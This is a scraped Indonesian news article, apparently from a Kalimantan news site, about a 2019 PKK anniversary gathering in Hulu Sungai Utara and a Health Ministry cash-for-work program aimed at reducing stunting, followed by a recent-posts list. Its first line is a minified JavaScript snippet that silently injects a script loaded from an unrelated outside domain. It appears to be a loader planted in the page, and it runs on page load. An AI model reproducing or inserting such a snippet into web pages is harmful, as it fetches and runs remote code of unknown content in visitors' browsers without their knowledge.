(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Menekan Stunting Lewat Program PKTD


AMUNTAI, Ratusan kader PKK hadir dalam peringatan Hari Kesatuan Gerak PKK ke-47 tahun 2019 Kabupaten Hulu Sungai Utara (HSU) di aula DR KH Idham Chalid Amuntai, Selasa (3/12).

Peringatan Hari Kesatuan Gerak PKK kali ini, sekaligus kunjungan kerja Direktorat Jenderal Kesehatan Masyarakat Kementerian Kesehatan RI monitoring dan evaluasi program Padat Karya Tunai Desa (PKTD) intervensi stunting di Kabupaten HSU.

Wakil Bupati HSU H Husairi Abdi mengatakan, kader-kader PKK di Kabupaten HSU diharapkan dapat meningkatkan motivasi, khususnya dalam melaksanakan 10 Program PKK, dengan menggelorakan semangat bagi kaum wanita untuk terus bersatu melahirkan putra-putri yang cerdas dengan pendidikan yang berkualitas.

Menurut Husairi, 10 Program Pokok pada hakikatnya merupakan kebutuhan dasar manusia, yaitu penghayatan dan pengamalan pancasila, gotong royong, pangan, sandang, perumahan dan tatalaksana rumah tangga, pendidikan dan keterampilan, kesehatan, pengembangan kehidupan berkoperasi, kelestarian lingkungan hidup, dan perencanaan sehat.

“Untuk itu, melalui peringatan Hari Kesatuan Gerak PKK ini, mari kita tingkatkan kinerja dan Gerakan PKK harus selaras dengan program pemerintah,” kata Husairi.

“Seperti program Padat Karya Tunai Desa (PKTD) intervensi stunting harus menjadi perhatian dan harus mendapatkan dukungan kita bersama, agar jumlah angka stunting khususnya di Kabupaten Hulu Sungai Utara dapat terus diturunkan,” lanjutnya.

Ketua TP PKK HSU Hj Anisah Rasyidah Wahid, PKK sebagai mitra pemerintah berkewajiban untuk secara konsisten mengiringi dan mendukung garis kebijakan pemerintah.

“Oleh sebab itu, kedepan diharapkan segenap jajaran TP PKK secara berjenjang di semua tingkatan, senantiasa bahu-membahu dengan tetap memiliki komitmen yang tinggi dan semangat yang kuat, melaksanakan peran dan fungsi PKK sebagai mitra pemerintah dalam pelaksanaan pembangunan dan pemberdayaan masyarakat,” bebernya.

Dalam kegiatan ini dilakukan serah terima aset intervensi stunting dalam peningkatan kualitas sanitasi melalui program Padat Karya Tunai Desa (PKTD) antara Kementerian Kesehatan yang diwakili Kasubdit Penyehatan Air dan Sanitasi Dasar Direktorat Kesehatan Masyarakat Ely Setyawati kepada Pemkab HSU. (dew)

Reporter : Dew
Editor : Bie

 


Desy Arfianty

Recent Posts

Amuntai Expo dan Bazar Ekonomi Kreatif 2024

KANALKALIMANTAN.COM, AMUNTAI - Memeriahkan Hari Jadi ke-72 Kabupaten Hulu Sungai Utara (HSU) digelar Amuntai Expo… Read More

8 jam ago

Warga Muhammadiyah Banjarbaru Berhalalbihalal di Masjid At Taqwa

KANALKALIMANTAN.COM, BANJARBARU - Pimpinan Cabang Muhammadiyah Banjarbaru Utara menggelar halalbihalal sekaligus Hari Bermuhammadiyah kali pertama… Read More

11 jam ago

5 Mei Hari Bidan Sedunia

KANALKALIMANTAN.COM – Negara-negara di dunia merayakan Hari Bidan Sedunia yang jatuh pada 5 Mei setiap… Read More

17 jam ago

Syamsudin Noor Jadi Bandara Domestik, Begini Respon Wali Kota Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Pencopotan status internasional pada Bandara Syamsudin Noor Banjarmasin yang terletak di Kota… Read More

17 jam ago

Presiden Jokowi di Booth PLN PEVS 2024, Dirut PLN Paparkan Kesiapan Ekosistem Kendaraan Listrik

KANALKALIMANTAN.COM, JAKARTA - Presiden Republik Indonesia Joko Widodo (Jokowi) mengunjungi booth PT PLN (Persero) dalam… Read More

20 jam ago

Akhir Pekan Pasti Hemat, Berikut Promo BRI hingga 30 Persen di 8 Kota Indonesia

KANALKALIMANTAN.COM – Bagi sebagian orang, akhir pekan (weekend) merupakan waktu yang dinanti. Sembari rehat bekerja,… Read More

24 jam ago

This website uses cookies.